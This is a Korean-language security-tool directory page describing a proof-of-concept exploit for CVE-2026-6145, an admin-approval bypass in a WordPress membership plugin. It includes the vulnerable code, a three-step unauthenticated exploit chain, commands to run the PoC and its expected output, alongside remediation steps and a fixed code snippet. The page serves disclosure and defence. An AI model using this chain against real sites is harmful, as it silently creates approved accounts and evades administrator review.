Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-6145 — 사용자 등록 및 멤버십 <= 5.1.5 - 인증되지 않은 관리자 승인 우회 ('action' 파라미터를 통한 권한 부여 누락) | Kitploit
도구/GitHubGitHub/hann1bl3l3ct3r/cve-2026-6145
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubhann1bl3l3ct3r/cve-2026-6145

CVE-2026-6145

사용자 등록 및 멤버십 <= 5.1.5 - 인증되지 않은 관리자 승인 우회 ('action' 파라미터를 통한 권한 부여 누락)

저장소 보기
13개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-6145 — User Registration & Membership for WordPress: 인증되지 않은 관리자 승인 우회

CVE-2026-6145에 대한 개념 증명 익스플로잇으로, WordPress용 User Registration & Membership 플러그인(≤ 5.1.5)에서 인증되지 않은 공격자가 새 계정 생성 시 관리자 승인 요구 사항을 우회할 수 있는 인가 누락 취약점입니다.

CVE CVSS CWE License


요약

CVE IDCVE-2026-6145
CNAWordfence
취약점인가 누락 — 관리자 승인 우회
CWECWE-862 (인가 누락)
CVSS 3.15.3 Medium (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
영향WordPress용 User Registration & Membership — 모든 버전 ≤ 5.1.5
패치됨버전 > 5.1.5
연구자Anthony Cihan — Offensive Security Lead, Obviam
공개Wordfence Responsible Disclosure Program
게시일2026-05-14

취약점 세부 정보

근본 원인

includes/class-ur-user-approval.php에 있는 is_admin_creation_process() 메서드는 새 등록을 관리자에 의한 생성으로 처리할지 여부를 결정하는 유일한 게이트입니다. 이 메서드가 true를 반환하면 두 가지 부작용이 발생합니다:

  • set_user_status()는 새 사용자의 상태를 승인됨으로 설정하여 보류 승인 대기열을 건너뜁니다.
  • send_request_notification_to_admin()은 새 등록에 대한 관리자 알림 이메일을 차단합니다.

5.1.5 버전에서 이 메서드 자체에는 인증, 인가 또는 nonce 검증이 포함되어 있지 않습니다:

root@kitploit:~
// includes/class-ur-user-approval.php:459-461
protected function is_admin_creation_process() {
    return ( isset( $_REQUEST['action'] ) && 'createuser' == $_REQUEST['action'] );
}

$_REQUEST는 $_GET, $_POST, $_COOKIE를 병합하기 때문에, 인증되지 않은 공격자는 등록 양식 제출 URL에 ?action=createuser를 추가하여 이 검사를 충족시킬 수 있습니다. 그러면 플러그인이 자동으로 계정을 승인하고 관리자에게 알리지 않습니다.

익스플로잇 체인

CVE-2026-6145는 구체적으로 is_admin_creation_process()의 인가 누락을 다루지만, 강화된 등록 양식에 대한 완전한 인증되지 않은 익스플로잇을 위해서는 동일한 플러그인 버전의 두 가지 부수적인 문제를 연결해야 하며, 포함된 PoC가 이 두 가지를 자동으로 처리합니다:

단계문제목적
1user_registration_get_recent_nonce wp_ajax_nopriv 엔드포인트를 통한 인증되지 않은 nonce 생성 (Referer만 확인)인증된 세션 없이 유효한 ur_frontend_form_nonce 획득
2양식 핸들러에서 ur_fallback_submit이 비어 있지 않을 때 AJAX nonce 검사 우회유효한 AJAX referer 없이 폴백 경로를 통해 등록 제출
3CVE-2026-6145 — $_REQUEST의 action=createuser가 is_admin_creation_process()를 true로 전환새 계정 자동 승인 및 관리자 알림 차단

결과: 관리자 상호 작용이나 알림 없이 생성된 완전히 승인된 사용자 계정으로, 명시적으로 새 등록에 관리자 승인이 필요한 사이트에서 발생합니다.


개념 증명

요구 사항

  • Python 3.8+
  • requests 라이브러리
  • 다음 조건을 충족하는 User Registration & Membership ≤ 5.1.5가 설치된 테스트 대상:
    • 등록 활성화
    • 관리자 승인 로그인 옵션 활성화
    • 알려진 등록 양식 ID (양식 페이지 소스에서 data-form-id로 확인 가능)

설치

root@kitploit:~
git clone https://github.com/<your-username>/CVE-2026-6145.git
cd CVE-2026-6145
pip install requests

사용법

root@kitploit:~
python3 poc_admin_approval_bypass.py <target_url> <form_id>

예시:

root@kitploit:~
python3 poc_admin_approval_bypass.py http://wp.example.lab 7

예상 출력

root@kitploit:~
======================================================================
  User Registration v5.1.4 - Admin Approval Bypass PoC
  CVE: 2026-6145 | CWE-862
  Affects: User Registration & Membership <= 5.1.5
======================================================================

[*] Target:  http://wp.example.lab
[*] Form ID: 7

[*] STEP 1: Obtaining nonce via unauthenticated AJAX endpoint
[+] SUCCESS: Got valid nonce for form 7: a1b2c3d4e5

[*] STEP 2: Registering user with admin approval bypass
    Username: poc_bypass_1747249200
    Email:    [email protected]
[+] Registration request processed (HTTP 200)

[*] STEP 3: Verifying user was created
[+] CONFIRMED: User 'poc_bypass_1747249200' exists in the database

======================================================================
  RESULTS
======================================================================
  Unauthenticated Nonce Generation:  CONFIRMED
  AJAX Nonce Bypass:                  CONFIRMED
  Admin Approval Bypass (CVE-...):    CONFIRMED

  [!] User was created with AUTO-APPROVED status
  [!] Admin was NOT notified of this registration
======================================================================

확인

PoC 실행 후 wp-admin에 로그인하여 Users → All Users를 확인합니다:

  • 생성된 계정이 승인됨 상태로 나타납니다.
  • 같은 기간에 일반 양식을 통해 등록된 사용자는 보류 중 상태로 남아 있습니다.
  • 관리자 알림 사서함에는 우회 계정에 대한 이메일이 없습니다.

영향

관리자 승인을 원치 않는 계정 생성에 대한 주요 게이트로 사용하는 WordPress 사이트(멤버십 사이트, 게이트 커뮤니티, 내부 포털, B2B 플랫폼, 액세스 전 신원 확인이 필요한 모든 사이트)에서 이 취약점은 해당 제어를 조용히 무력화합니다. 구체적인 결과는 다음과 같습니다:

  • 비즈니스 로직 액세스 제어 우회: 등록이 필요한 콘텐츠나 기능(멤버십 전용 페이지, 제한된 포럼, 게이트 다운로드)이 관리자 검토 없이 접근 가능해집니다.
  • 사기 및 악용 방지 조치 무력화: 스팸, 가짜 또는 사기성 등록을 걸러내기 위해 관리자 승인을 사용하는 사이트는 해당 필터를 완전히 잃게 됩니다.
  • 은밀한 계정 프로비저닝: 관리자 알림도 차단되므로 승인되지 않은 계정이 수동 사용자 감사 때까지 감지되지 않고 유지될 수 있습니다.
  • 추가 공격을 위한 발판: 승인된 낮은 권한의 계정은 이후 권한 상승, 콘텐츠 악용 또는 동일 사이트의 다른 인증 필요 취약점 악용을 위한 거점이 됩니다.

CVSS 점수는 무결성에만 영향을 미치지만(직접적인 데이터 기밀성 손실이나 서비스 중단 없음), 실제 영향은 영향을 받는 사이트가 승인 워크플로를 보안 경계로 얼마나 많이 의존하는지에 따라 달라집니다.


영향을 받는 버전

버전상태
≤ 5.1.5취약
> 5.1.5패치됨

해결 방법

사이트 관리자용

  1. 즉시 업데이트하여 User Registration & Membership의 최신 버전(> 5.1.5)으로 업데이트하세요.
  2. 취약한 버전이 설치된 이후 생성된 예상치 못한 승인된 계정이 있는지 Users → All Users를 감사하세요. 해당 관리자 알림 이메일이 없는 계정에 특히 주의하세요.
  3. 식별된 의심스러운 계정에 대한 자격 증명을 교체하고 활동을 검토하세요.
  4. 즉시 업데이트가 불가능한 경우, 일시적 완화 조치로 WordPress 설정에서 공개 등록을 비활성화하세요.

개발자용 / 코드 참조

취약한 메서드에는 기능 검사와 유효한 nonce가 모두 필요해야 합니다:

root@kitploit:~
protected function is_admin_creation_process() {
    return current_user_can( 'create_users' )
        && isset( $_REQUEST['action'] )
        && 'createuser' === $_REQUEST['action']
        && isset( $_REQUEST['_wpnonce_create-user'] )
        && wp_verify_nonce(
               wp_unslash( $_REQUEST['_wpnonce_create-user'] ),
               'create-user'
           );
}

공개 타임라인

날짜이벤트
2026-03-09플러그인 v5.1.4의 공인 보안 감사 중 취약점 발견
2026-03-09Wordfence Responsible Disclosure Program에 초기 보고서 제출
2026-04-12Wordfence(CNA)에 의해 CVE-2026-6145 예약됨
2026-05-14공급업체 패치 버전 게시; CVE-2026-6145 게시
2026-05-14공개 권고와 함께 이 PoC 릴리스

참고 자료

  • Wordfence Advisory — CVE-2026-6145
  • NVD — CVE-2026-6145
  • CWE-862: Missing Authorization
  • WordPress Plugin Repository — User Registration & Membership

동일 플러그인의 관련 취약점

이 플러그인의 인가 모델을 추적하는 연구자들은 다음에도 관심을 가질 수 있습니다:

  • CVE-2026-1492 — 인증되지 않은 권한 상승 (≤ 5.1.2)
  • CVE-2026-1779 — register_member를 통한 인증 우회 (≤ 5.1.2)
  • CVE-2026-4056 — 콘텐츠 액세스 규칙 REST API의 손상된 액세스 제어 (5.0.1 – 5.1.4)
  • CVE-2026-6203 — 인증되지 않은 오픈 리다이렉트 (≤ 5.1.4)

크레딧

연구, 발견 및 PoC 개발:

Anthony Cihan Offensive Security Lead — Obviam

이 작업을 인용하는 경우 CVE-2026-6145를 Anthony Cihan / Obviam에 귀속하여 인용해 주십시오.


법적 및 윤리적 고지

이 개념 증명은 방어 연구, 탐지 엔지니어링 및 공인된 보안 테스트 목적으로만 게시되었습니다. 다음을 지원하기 위한 것입니다:

  • WordPress 사이트 관리자가 패치 배포 확인
  • 보안 업체가 탐지 시그니처 및 WAF 규칙 개발
  • 연구자가 WordPress 플러그인의 인가 제어 패턴 연구
  • 공격 및 방어 보안 프로그램의 교육자 및 학생

원본 연구는 공인된 실험실 환경에서 서명된 계약 하에 수행되었으며, 공개 전에 Wordfence Responsible Disclosure Program을 통해 공급업체에 조정된 공개가 이루어졌습니다.

소유하지 않거나 명시적 서면 테스트 허가를 받지 않은 시스템에 대해 이 PoC를 실행하는 것은 미국 컴퓨터 사기 및 남용법(18 U.S.C. § 1030), 영국 컴퓨터 남용법 1990, EU Directive 2013/40/EU 및 대부분의 관할권에서 이에 상응하는 법률에 따라 불법입니다. 작성자와 Obviam은 이 코드의 오용에 대한 모든 책임을 부인합니다.

이 저장소를 사용함으로써 귀하는 본 약관을 읽고 이해했으며 동의했음을 인정하는 것입니다.


라이선스

MIT License 하에 릴리스되었습니다. 위 크레딧 섹션에 따라 저작자 표시가 필요합니다.

도구 다운로드